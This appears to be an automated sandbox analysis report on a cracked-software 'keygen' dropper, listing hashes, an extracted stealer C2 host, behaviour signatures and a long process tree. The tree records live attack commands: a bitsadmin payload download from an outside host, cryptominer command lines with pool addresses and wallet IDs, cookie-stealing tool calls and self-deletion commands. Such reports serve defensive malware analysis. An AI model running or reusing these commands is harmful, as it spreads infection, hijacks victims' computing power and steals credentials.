Resubmissions

24-04-2021 20:33

210424-t3nc6v2zm6 10

24-04-2021 20:33

210424-tvfj4vfree 10

Analysis

  • max time kernel
    1800s
  • max time network
    1796s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 20:33

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 46 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1172
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1360
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1392
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1860
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1072
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:860
              • C:\Users\Admin\AppData\Roaming\twdjbsd
                C:\Users\Admin\AppData\Roaming\twdjbsd
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:6888
                • C:\Users\Admin\AppData\Roaming\twdjbsd
                  C:\Users\Admin\AppData\Roaming\twdjbsd
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:3788
              • C:\Users\Admin\AppData\Roaming\jsdjbsd
                C:\Users\Admin\AppData\Roaming\jsdjbsd
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:6724
              • C:\Users\Admin\AppData\Roaming\twdjbsd
                C:\Users\Admin\AppData\Roaming\twdjbsd
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:5400
                • C:\Users\Admin\AppData\Roaming\twdjbsd
                  C:\Users\Admin\AppData\Roaming\twdjbsd
                  3⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:5828
              • C:\Users\Admin\AppData\Roaming\jsdjbsd
                C:\Users\Admin\AppData\Roaming\jsdjbsd
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:6848
              • C:\Users\Admin\AppData\Roaming\twdjbsd
                C:\Users\Admin\AppData\Roaming\twdjbsd
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:5288
                • C:\Users\Admin\AppData\Roaming\twdjbsd
                  C:\Users\Admin\AppData\Roaming\twdjbsd
                  3⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  PID:6592
              • C:\Users\Admin\AppData\Roaming\jsdjbsd
                C:\Users\Admin\AppData\Roaming\jsdjbsd
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                PID:4224
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:992
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2436
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2700
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2740
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2720
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:1808
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1400
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2472
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2764
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1096
                        • C:\Users\Admin\AppData\Local\Temp\is-JGC30.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-JGC30.tmp\Install.tmp" /SL5="$401A6,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1544
                          • C:\Users\Admin\AppData\Local\Temp\is-TNSLK.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-TNSLK.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3516
                            • C:\Program Files\Google\JEWMCKBOBJ\ultramediaburner.exe
                              "C:\Program Files\Google\JEWMCKBOBJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1220
                              • C:\Users\Admin\AppData\Local\Temp\is-D6U2C.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-D6U2C.tmp\ultramediaburner.tmp" /SL5="$400D4,281924,62464,C:\Program Files\Google\JEWMCKBOBJ\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:1720
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4108
                            • C:\Users\Admin\AppData\Local\Temp\bd-0abce-7c7-2138d-007477cc05496\Qugaekylati.exe
                              "C:\Users\Admin\AppData\Local\Temp\bd-0abce-7c7-2138d-007477cc05496\Qugaekylati.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4144
                            • C:\Users\Admin\AppData\Local\Temp\3e-45394-b24-e8983-e64bb183f3fe3\ZHysybalaegae.exe
                              "C:\Users\Admin\AppData\Local\Temp\3e-45394-b24-e8983-e64bb183f3fe3\ZHysybalaegae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4228
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2ik4qcy.jna\instEU.exe & exit
                                6⤵
                                  PID:5072
                                  • C:\Users\Admin\AppData\Local\Temp\g2ik4qcy.jna\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\g2ik4qcy.jna\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2824
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ft3s5gwd.sad\google-game.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5392
                                  • C:\Users\Admin\AppData\Local\Temp\ft3s5gwd.sad\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\ft3s5gwd.sad\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5572
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                        PID:5708
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\meydgbyg.1mr\md1_1eaf.exe & exit
                                    6⤵
                                      PID:5876
                                      • C:\Users\Admin\AppData\Local\Temp\meydgbyg.1mr\md1_1eaf.exe
                                        C:\Users\Admin\AppData\Local\Temp\meydgbyg.1mr\md1_1eaf.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:4392
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhi4hvj4.njg\y1.exe & exit
                                      6⤵
                                        PID:5140
                                        • C:\Users\Admin\AppData\Local\Temp\vhi4hvj4.njg\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\vhi4hvj4.njg\y1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5664
                                          • C:\Users\Admin\AppData\Local\Temp\2R4RU1Bi92.exe
                                            "C:\Users\Admin\AppData\Local\Temp\2R4RU1Bi92.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:1388
                                            • C:\Users\Admin\AppData\Roaming\1619298480765.exe
                                              "C:\Users\Admin\AppData\Roaming\1619298480765.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619298480765.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:6788
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\2R4RU1Bi92.exe"
                                              9⤵
                                                PID:3880
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:6352
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vhi4hvj4.njg\y1.exe"
                                              8⤵
                                                PID:6396
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:6588
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymygktbt.gy0\askinstall39.exe & exit
                                            6⤵
                                              PID:5504
                                              • C:\Users\Admin\AppData\Local\Temp\ymygktbt.gy0\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\ymygktbt.gy0\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5828
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:5844
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5148
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lghi0kgl.yxu\inst.exe & exit
                                                6⤵
                                                  PID:5616
                                                  • C:\Users\Admin\AppData\Local\Temp\lghi0kgl.yxu\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\lghi0kgl.yxu\inst.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5936
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ysliiii.vhs\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:5080
                                                    • C:\Users\Admin\AppData\Local\Temp\3ysliiii.vhs\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\3ysliiii.vhs\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:4576
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4336
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:6408
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:2168
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1764
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:3988
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:6688
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:7072
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:4128
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:6560
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pHdzODtajtIetLGd -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:6152
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5488
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5252
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4532
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:6160
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4640
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWLqXxKeTaZF\uWLqXxKeTaZF.dll" uWLqXxKeTaZF
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              PID:6464
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWLqXxKeTaZF\uWLqXxKeTaZF.dll" uWLqXxKeTaZF
                                                                                9⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                PID:6452
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4588
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:6440
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5148
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:6388
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst82F3.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:6172
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:6788
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owyglcno.jmt\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5700
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gsu41a0e.5jn\toolspab1.exe & exit
                                                                                      6⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:5708
                                                                                      • C:\Users\Admin\AppData\Local\Temp\gsu41a0e.5jn\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\gsu41a0e.5jn\toolspab1.exe
                                                                                        7⤵
                                                                                          PID:5136
                                                                                          • C:\Users\Admin\AppData\Local\Temp\gsu41a0e.5jn\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\gsu41a0e.5jn\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4516
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzrni3bf.t3u\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:5464
                                                                                          • C:\Users\Admin\AppData\Local\Temp\gzrni3bf.t3u\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\gzrni3bf.t3u\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5356
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixq3cmpn.vti\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:5196
                                                                                            • C:\Users\Admin\AppData\Local\Temp\ixq3cmpn.vti\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\ixq3cmpn.vti\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2288
                                                                                              • C:\Users\Admin\AppData\Local\Temp\ixq3cmpn.vti\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\ixq3cmpn.vti\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:6048
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4352
                                                                                    • C:\Users\Admin\AppData\Roaming\3F9F.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\3F9F.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:3768
                                                                                      • C:\Users\Admin\AppData\Roaming\3F9F.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\3F9F.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:5192
                                                                                    • C:\Users\Admin\AppData\Roaming\4220.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\4220.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5168
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w11364@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:5800
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13881 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:5012
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:5072
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:5648
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:5028
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5484
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:6604
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5136
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6912
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5572
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
